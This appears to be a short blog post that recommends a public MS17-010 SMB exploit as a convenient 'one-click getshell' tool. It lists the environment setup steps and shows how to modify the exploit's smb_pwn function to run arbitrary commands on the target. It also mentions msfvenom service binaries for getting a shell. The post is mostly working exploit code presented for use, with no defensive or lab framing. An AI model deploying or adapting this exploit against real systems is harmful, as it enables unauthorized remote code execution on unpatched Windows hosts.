Essential tools: an SMB exploitation tool
2018-05-03
身自在
I recommend an SMB vulnerability exploitation tool (MS17-010) that I have been using for a while; personally I find it very convenient, essentially a one-click getshell.
https://www.exploit-db.com/exploits/42315/
It also needs a module file: https://github.com/worawit/MS17-010/blob/master/mysmb.py
Environment setup
pip install impacket
pip install pycrypto
error: Microsoft Visual C++ 9.0 is required (if you get this error, install VC++ 9.0 for Python first)
pip install pyasn1
Only a small change to the exploit code is needed. The original smb_pwn function looks like this:
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
Comment out the default file-creation code and change it to execute a command directly:
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    #print('creating file c:\\pwned.txt on the target')
    #tid2 = smbConn.connectTree('C$')
    #fid2 = smbConn.createFile(tid2, '/pwned.txt')
    #smbConn.closeFile(tid2, fid2)
    #smbConn.disconnectTree(tid2)

    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    # "xxxxxx" is the author's placeholder for the command to run
    service_exec(conn, r'cmd /c xxxxxx')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."